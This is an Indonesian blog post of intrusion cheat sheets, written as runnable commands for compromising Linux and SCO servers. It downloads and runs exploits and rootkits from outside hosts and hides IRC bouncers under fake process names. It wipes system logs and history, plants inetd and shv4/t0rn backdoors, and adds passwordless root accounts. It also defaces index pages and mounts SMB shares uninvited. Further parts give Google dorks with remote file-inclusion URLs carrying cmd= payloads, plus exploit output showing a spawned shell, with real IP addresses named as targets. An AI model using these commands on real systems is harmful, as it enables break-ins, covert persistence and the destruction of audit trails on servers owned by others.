Pages

Subscribe:

Friday, September 30, 2011

Hacking Shell

Posted: January 22, 2007 by miji in hacking
0
TRIK MEMBUAT PSYBNC : =================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/;
mkdir …. ; cd …. ; wget http://www.geocities.com/lifron/Pre-psyBNC.tgz;
mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ;
cd .log ; make; mv psybnc “bash ” ; rm psybnc.conf ; wget http://www.geocities.com/lifron/psybnc.conf.20075.txt;
mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt ” ” ; pwd ; PATH=$PATH:/var/tmp/…./.log/;
“bash ” ” “mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ;
find |grep psybnc
===================================================
: TRIK MENGHAPUS LOG :
=================================================== echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================== rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r

===================================================
: LOCAL ROOT MANDRAKE :
=================================================== unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ;
cd /tmp ; mkdir ” ” ; cd ” ”
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7.mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo “tondano::0:0::/.tondano:/bin/bash” >> /etc/passwd
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
13. Login ke shell terus bersihkan log dan pasang backdoor
14.last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, misal ./setup gohanz 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/” ” <== Bersihkan semua tools 25. Test shell dengan port 7788, login as : root, password : gohanz =================================================== find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA ToNDaNo Was Here” > index.html
=================================================== cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA ToNDaNo Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
===================================================
BIKIN BACKDOOR
=================================================== echo “kuntua 1979/tcp” >> /etc/services
echo “dial stream tcp nowait root /bin/sh sh -i” >> /etc/inetd.conf kill -HUP 135
telnet dengan port “1979″
=================================================== http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================== [root@gila /]#rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address HWtype HWaddress Flags Mask Iface
192.168.0.6 ether 00:08:C7:C2:0F:1B C eth1
192.168.0.4 ether 00:80:5F:0E:B7:28 C eth1
192.168.0.5 ether 00:00:B4:3C:AC:41 C eth1
192.168.0.2 ether 00:C0:4F:94:CC:70 C eth1
192.168.0.3 ether 00:10:5A:71:17:E3 C eth1
192.168.0.1 ether 00:00:21:28:8C:47 C eth1
[root@gila /]# nmblookup -d2 ‘*’ #untuk mendeteksi netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR NETBIOS NAME WORKGROUP/OS/VERSION
—————————————–
192.168.0.1 CYBER1 [CYBER]
192.168.0.2 CYBER2 [CYBER]
192.168.0.3 CYBER3 [CYBER]
192.168.0.4 CYBER4 [CYBER]
192.168.0.5 CYBER5 [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
Sharename Type Comment
——— —- ——-
A Disk
C Disk
D Disk
E Disk
IPC$ IPC Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa ffastun.ffo install RECYCLED
ffastun0.ffx ffastun.ffl film win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================== bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================== gcc sco-pop.c -o sco-pop
./sco-pop www.target.com
/var/adm
=================================================== : BERSIHKAN LOG :
=================================================== ctlog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================== securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================== 1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
./ssl 204.145.119.253
=================================================== 1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================== 1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
./openssl-too-open -a 0×15 -v 212.70.224.129
=================================================== 1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
./setup 7788 35b4tu
================================================ 1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
./massplo 210.10 -d 8
================================================ 1. wgetwww.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4. ./apache 208.134.131.49
./massossl 80 443 13
./mapache 443 210.10
================================================ 1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
================================================ 1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning ./sambal -d 0 -C 60 -S IP | grep samba ./sambal -b 0 -v IP <=== attack ================================================ SecureCRT: http://www.vandyke.com/ TTSSH: http://www.zip.com.au/~roca/ttssh.html PuTTY: http://www.chiark.greenend.org.uk/~sgtatham/putty.html SecureShell: http://public.srce.hr/~cigaly/ssh/ ================================================ DEFACE ================================================ find index.html whereis index.html locate index.html default : cd /var/www/html echo “KuNTuA Was Here” > index.html
================================================ cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo “KuNTuA Was Here” > mnc.html
untuk mentesnya :
http://IP-yg-kamu-hack/~apache
================================================ Install WGET
================================================ 1. coba ketik: cat /etc/issue, untuk melihat Sistem Operasinya
2. ketik: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit dari ftp
8. Proses Peng-Instalan
rpm -ivh wget-1.8.2-4.70.i386.rpm
http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+…&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff ./configure make ssh ./ssh -l root ./ssh -l root 66.136.37.101 ./ssh -l root 66.149.178.214 ================================================ : COMMAND ADDUSER : ================================================ /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua /usr/sbin/useradd tondano -u 0 -d / passwd -d kuntua Changing password for user kuntua Removing password for user kuntua passwd: Success passwd -d tondano Changing password for user tondano Removing password for user tondano passwd: Success ================================================ passwd kuntua New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user kuntua passwd: all authentication tokens updated successfully password tondano New UNIX password: kuntua75 Retype new UNIX password: kuntua75 Changing password for user tondano passwd: all authentication tokens updated successfully ================================================ ================================================ OPENSSL-TOO-OPEN ================================================ ./openssl -a 0×15 -v 61.220.53.91 : openssl-too-open : OpenSSL remote exploit by Solar Eclipse : Opening 30 connections Establishing SSL connections -> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0×80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0×80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0×80e1638 start_addr: 0×80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell…
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
================================================ : MARI KITA MAINKAN ROOTNYA :
================================================ unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir … ; cd ….
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir ’segfault.eng’ and touch a file named ’segfault.eng’ in it.
Then exec “./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792″ to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
================================================ /usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo “apache::0:0::/mails:/bin/bash” >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
login ke shell
last | grep mails
su apache
mkdir /var/tmp/” ”
cd /var/tmp/” ”
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/” ” <== del semua tools test shell with port 7788 and password 35b4tud1n91n ================================================ [Langkah Hapus Log I] ================================================ export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0 ================================================ [Langkah Hapus Log I] ================================================ rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r ================================================ wget http://brutalside.host.sk/tools/term chmod +x term ./term lonthe123 ================================================ wget http://brutalside.host.sk/tools/ftp.tgz gunzip ftp.tgz gzip ftp.tar tar -zxvf ftp.tar.gz cd ftp ./scan 163 22 10 ./scan 163 22 10 163 ================================================ scan port dgn pscan.c ==> www.packetstormsecurity.nl
bila port:23 vurnerable bisa running exploit
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
================================================ http://brutalside.host.sk/tools/kik
chmod +x kik
./kik “-bash” ./psybnc
================================================ ================================================ find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Terus konek ke shell dengan user biasa,masuk ke cd /tmp dan
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Sampai disini kita selesai dengan permainan di server target root
Sekarang kita kembali ke user dan ketik :
./sh
nah, apa yg terjadi setelah kita jalankan command ./sh…?
yg terjadi adalah uid dan gid kita adalah 0
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
./psybnc psybnc.conf
================================================ wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc “syslogd ”
echo “PSYBNC.SYSTEM.PORT1=60000″ >> psybnc.conf
echo “PSYBNC.SYSTEM.HOST1=*” >> psybnc.conf
echo “PSYBNC.HOSTALLOWS.ENTRY0=*;*” >> psybnc.conf
mv psybnc.conf ” ” ; pwd
PATH=$PATH:/var/tmp/” “/.log/
“syslogd ” ” ”
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
================================================ +Command Mapache2x
- ./mapache RangeIP (mis: ./mapache 200 443 10 10) << Scan - ./apache IPTarget (Mis: ./apache 202.11159.67.176) ================================== +Command MassApache - ./massossl RangeIP (mis: ./massossl 22200 443 10 10) << Scan - ./osslx -a 0x0b -v IPTarget (Mis: ./ooosslx -a 0x0b -v 202.159.67.176) ================================================ +FTP Command 4 RooT - ./scan No Depan IP Target (Mis: ./scannn 210 21 10) =addUser= uid=0(root) gid=0(root) groups=50(ftp) Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow adduser? ketik /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua enter, buat password ketik passwd kuntua enter , abis itu ketik tondano tekan enter abis itu ketik lagi tondano , nb: ketik tondano dua kali itu kegunaan nya buat password kita Changing password for user ganjen passwd: all authentication tokens updated successfully berarti kita udah dapet user di shell tersebut, jadi tinggal login aja, jangan lupa catet ip nyah.. kalo mau dapet acces root ketik : /usr/sbin/useradd bash -u 0 -d / abis itu ketik lagi passwd -d bash apus jejak cd / rm -f /.bash_history /root/.bash_history /var/log/messages ln -s /dev/null /root/.bash_history touch /var/log/messages chmod 600 /var/log/messages rm -rf /var/log/lastlog cat > /var/log/lastlog
udah di ketik semua ? udahh… tekan ctrl d .
=================================
+Backdoor
NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
—————–
Patch Your Root
—————–
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
BERSIH JEJAK:manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
——————-
Add user dlm Root:
——————-
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
—————————-
**add user accses root
—————————-
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
———–
Del User
———–
/usr/sbin/userdel -r [namauser]
PENTING
kalo so dapat ROOT
ketik id
uname -a
abis itu
ketik cd /tmp
—————–
——————————————–
ngeROOT ssh LINUX port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port co:./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
——————————————–
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <— scan massal SSH ./r00t 203.20 -d 2 <— scan massal FTP ./r00t 203.20 -d 3 <— scan massal FTP ./r00t 134.7. -d 4 ——————————————– ngeROOT utk OS SCO : wget www.renjana.com/sco ./sco IP ——————————————– pasang BackDoor: 1. id uname -a cd /tmp wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz ls -al tar -zxvf tk.tgz cd tk ./t0rn kuntua 7000 ——————————————– LINKS: http://www.eviltime.com/download/exploit www.cahcepu.net www.vibrasi.net www.paktani.tk www.sisilainrevolt.org www.sitiung.com www.utay-doyan.cc www.atstake.com/research/redirect.html?users/10pht/nc110.tgz ======= Usage: ./sambal [-bBcCdfprsStv] [host] -b bruteforce (0 = Linux, 111 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B bruteforce steps (defaulllt = 300) -c connectback ip address -C max childs for scan/bruttteforce mode (default = 40) -d bruteforce/scanmode delaaay in micro seconds (default = 100000) -f force -p port to attack (default = 139) -r return address -s scan mode (random) -S scan mode -t presets (0 for a list) -v verbose mode CONTOH: [esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) ————————————————————– + Scan mode. + [192.168.0.3] Samba + [192.168.0.10] Windows + [192.168.0.35] Windows + [192.168.0.36] Windows + [192.168.0.37] Windows … + [192.168.0.133] Samba ./sambal -b 0 -v =========== Usage: ./mayday-linux -t [-pa] -t target The host to attack. -a password Default password is “chaaangeme”. -p port Default port is 8001. ================ /usr/sbin/adduser httpd passwd httpd ============ PACTH SAMBA = root@redeye samba]# /etc/init.d/smb stop = Shutting down SMB services: [ OK ] = Shutting down NMB services: [ OK ] = [root@redeye root]# cd /etc/samba = [root@redeye samba]# wget http://master.samba.org/samba/ftp/patches/patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# gunzip patch-2.2.8-2.2.8a.diffs.gz = [root@redeye samba]# patch -p1 < patch-2.2.8-2.2.8a.diffs = [root@redeye samba]# /etc/init.d/smb start ======================= ======= VHOST = edit di httpd.conf = tinggal tambah no = kong di named.conf = 1. wget http://apache.towardex.com/httpd/apache_1.3.27.tar.gz = 2. tar zxvf apache_1.3.27.tar.gz = 3. cd apache_1.3.27 = 4. ./configure = 5. make = 6. make install = 7. /usr/local/apache/bin/apachectl start = cd /usr/local/apache/conf/httpd.conf = contoh = echo “” > httpd.conf
= echo “ServerName www.Cmaster4.net” > httpd.conf
= echo “DocumentRoot /home/iptek/public_html” > httpd.conf
= echo “ScriptAlias /cgi-bin /www/Cmaster4.net/cgi-bin” > httpd.conf
= echo “” >> httpd.conf
= ——————————
= ——————————
= ——————————
= find |grep name.conf
= echo “zone “i-am.Cmaster4.net” IN {” > named.conf
= echo “type master; > named.conf
= echo “file “/var/named/named.local”;” > named.conf
= echo “allow-update { none; };” > named.conf
= echo “};” >> named.conf
= nah setelah itu kamu restart named dan httpd nya
= /etc/init.d/named stop
= /etc/init.d/named start
= /etc/init.d/httpd stop
= /etc/init.d/httpd start
= atau
= /etc/rc.d/init.d/named stop
= /etc/rc.d/init.d/named start
= /etc/rc.d/init.d/httpd stop
= /etc/rc.d/init.d/httpd start
= atau kalau bukan di /etc/init.d/ coba ketik find |grep named dan berikutnya find |grep httpd
=================================================================
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; tar -zxvf Pre-psyBNC.tgz; cd psybnc; make; wget http://www.geocities.com/lifron/psybnc.conf.6669.txt; mv psybnc.conf.6669.txt .sh; wget http://www.geocities.com/lifron/kik; chmod +x kik; ./kik “/usr/sbin/httpd -DHAVE_PROXY -DHAVE” ./psybnc .sh; cd ..; rm -rf Pre-psyBNC.tgz
====================
EGGDROP
====================
= wget www.geocities.com/lifron/eggdrop.tar.gz; tar -zxvf eggdrop.tar.gz; cd eggdrop; wget www.geocities.com/lifron/bot.conf; cd scripts; wget www.geocities.com/lifron/netgate.tcl; cd ..
= ./eggdrop -mnt bot.conf
./eggdrop -m bot.conf
==============
My_eGallery from K-159
==============
1.pasangin bindtty
2. kalo ggk jalan bindtty nya pasangin shell.php
3.kalo ggk jalan juga coba cgi-telnet
contohnya
http://livron.port5.com/mail.php <———ini source shell misalnya: http://www.moonshade.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=wget%20http://livron.port5.com/mail.php kalo gak bisa kita cari folder yg bisa buat id wwrun utk wget kalo bisa… buka: http://www.target.org/modules/My_eGallery/public/mail.php ======== pasang bindtty wget www.geocities.com/lifron/bindtty -O /tmp/httpd ini biar hasil wgetnya di taro di folder /tmp dg nama file httpd baru bikin file exekusi chmod 755 /tmp/httpd ============ cgi-telnet mencari folder cgi-binnya >> disitulah kita Taro cgi-telnetnya
biasanya folder cgi-bin ada di folder …/www
tp kebanyakan webserver
tiap user di beri folder cgi-bin masing2
contoh:
/home/users/russisk/html/modules/My_eGallery/public <——td kan kita ada di folder ini http://www.russisk.org/modules/My_eGallery/public/displayCategory.php?basepath=http://www.geocities.com/lifron/suntik.txt?&cmd=ls%20-al%20/home/users/russisk kliatan cgi-bin-nya cd ke folder cgi-bin baru wget ke situ Contoh: wget http://livron.port5.com/kuntua.pl -O /home/users/russisk/cgi-bin/cgi.pl kalo bisa lanjut ke chmod 755 /home/users/russisk/cgi-bin/cgi.pl <——-agar file cgi.pl nya jd file eksekusi kalo bisa tinggal buka: www.target.org/cgi-bin/cgi.pl port 7788 ============ end wget www.geocities.com/lifron/psy.tar.gz; tar -zvxf psy.tar.gz cd .psy ./config KuNTuA 6669 ./fuck ./run =========== Tittle : SUPER KIDDIES HACKING: “PHP SUPER BUGS” Author : K-159 Greetz : Lieur-Euy, Red_Face, Itsme-, yudhax, pe_es, bithedz, KuNtuA, Baylaw, Minangcrew, Chanel : #bandunghacker, #indohackinglink, #hackercrew, #batamhacker, #aikmel Email : eufrato@linuxmail.org Reference : security-corporations.com, security-focus.com, bugs-traq, google.com ——————————————————————————————————– Prolog : i wrote this tutorial just for my dearest brother “Lieur-Euy” thx for all the best friendship, spirit, motivation, kindness, joke, and all the time that we spend together. just wait, till i finished my homework. ‘n we will rock the world again 1. allinurl filename bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?filename=*”. keyword ‘*.php’ bisa di ganti dengan apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?filename=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?filename=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 2. allinurl content bugs content ini targetnya dapat kita cari dengan keyword “allinurl:*.php?content=”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?content=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: ” http://www.target.com/target/index.php?content=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts “ kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 3. allinurl page bugs page ini targetnya dapat kita cari dengan keyword “allinurl:*.php?page=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?page=”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?page=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 4. allinurl link bugs filename ini targetnya dapat kita cari dengan keyword “allinurl:*.php?link=*”. keyword ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?link=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?link=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, imageview.php, modules.php, dsb. 5.allinurl file bugs file ini targetnya dapat kita cari dengan keyword “allinurl:*.php?file=*”. ‘*.php’ bisa di ganti dengan file apa saja, misalnya dengan index.php. maka keyword yang kita masukkan di google adalah “allinurl:index.php?file=*”. Setelah mendapatkan target maka buat lah urlnya jadi seperti ini: http://www.target.com/target/index.php?file=http://www.geocities.com/inul_asoy/injex.txt?&cmd=ls -al;uname -ar;id;pwd;cat /etc/hosts kita juga bisa mencoba target lainnya nya dg keyword base.php, page.php, content.php, view.php, 